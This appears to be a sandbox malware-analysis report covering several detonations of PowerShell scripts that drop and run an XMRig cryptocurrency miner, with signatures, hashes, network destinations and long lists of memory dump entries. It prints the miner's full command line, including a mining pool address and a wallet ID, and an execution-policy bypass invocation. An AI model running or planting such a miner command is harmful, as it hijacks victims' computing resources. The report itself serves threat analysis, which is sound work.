memory/2972-69-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-70-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-71-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-72-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-73-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-74-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-75-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-76-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-77-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-78-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-79-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-80-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-81-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-82-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-83-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-84-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-85-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-86-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-87-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-88-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-89-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-90-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-91-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-92-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-93-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-94-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-95-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-96-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-97-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-98-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-99-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-100-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-101-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-102-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-103-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-104-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-105-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-106-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-107-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-108-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-109-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-110-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-111-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-112-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-113-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-114-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-115-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-116-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:41

Platform

win11-20240508-en

Max time kernel

1793s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp

Files

memory/2492-0-0x00007FFC1B913000-0x00007FFC1B915000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5rloflwa.nzq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2492-9-0x000001FC45F00000-0x000001FC45F22000-memory.dmp

memory/2492-10-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp

memory/2492-11-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp

memory/2492-12-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp

memory/2492-13-0x00007FFC1B910000-0x00007FFC1C3D2000-memory.dmp

memory/2492-15-0x000001FC5E380000-0x000001FC5E392000-memory.dmp

memory/2492-16-0x000001FC45EF0000-0x000001FC45EFA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3848-47-0x00000265CF8E0000-0x00000265CF900000-memory.dmp

memory/3848-48-0x0000026661EA0000-0x0000026661EC0000-memory.dmp

memory/3848-49-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-50-0x0000026662520000-0x0000026662540000-memory.dmp

memory/3848-51-0x0000026662500000-0x0000026662520000-memory.dmp

memory/3848-52-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-53-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-56-0x0000026662500000-0x0000026662520000-memory.dmp

memory/3848-55-0x0000026662520000-0x0000026662540000-memory.dmp

memory/3848-54-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-57-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-58-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-59-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-60-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-61-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-62-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-63-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-64-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-65-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-66-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-67-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-68-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-69-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-70-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-71-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-72-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-73-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-74-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-75-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-76-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-77-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-78-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-79-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-80-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-81-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-82-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-83-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-84-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-85-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-86-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-87-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-88-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-89-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-90-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-91-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-92-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-93-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-94-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-95-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-96-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-97-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-98-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-99-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-100-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-101-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-102-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-103-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-104-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-105-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-106-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-107-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-108-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-109-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-110-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-111-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-112-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-113-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-114-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

memory/3848-115-0x00007FF7D5910000-0x00007FF7D6543000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:41

Platform

win10-20240404-en

Max time kernel

1792s

Max time network

1747s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/1636-3-0x00007FFF097B3000-0x00007FFF097B4000-memory.dmp

memory/1636-5-0x0000021026640000-0x0000021026662000-memory.dmp

memory/1636-8-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y41a0gmz.o5y.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1636-10-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/1636-9-0x00000210267F0000-0x0000021026866000-memory.dmp

memory/1636-25-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/1636-29-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/1636-30-0x00007FFF097B3000-0x00007FFF097B4000-memory.dmp

memory/1636-31-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/1636-32-0x00007FFF097B0000-0x00007FFF0A19C000-memory.dmp

memory/1636-52-0x0000021026CC0000-0x0000021026CD2000-memory.dmp

memory/1636-65-0x00000210267D0000-0x00000210267DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4568-94-0x0000014BB1470000-0x0000014BB1490000-memory.dmp

memory/4568-95-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-96-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-97-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-98-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-99-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-100-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-101-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-102-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-103-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-104-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-105-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-106-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-107-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-108-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-109-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-110-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-111-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-112-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-113-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-114-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-115-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-116-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-117-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-118-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-119-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-120-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-121-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-122-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-123-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-124-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-125-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-126-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-127-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-128-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-129-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-130-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-131-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-132-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-133-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-134-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-135-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-136-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-137-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-138-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-139-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-140-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-141-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-142-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-143-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-144-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-145-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-146-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-147-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-148-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-149-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-150-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-151-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-152-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-153-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-154-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-155-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-156-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

memory/4568-157-0x00007FF7FD170000-0x00007FF7FDDA3000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:47

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1746s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

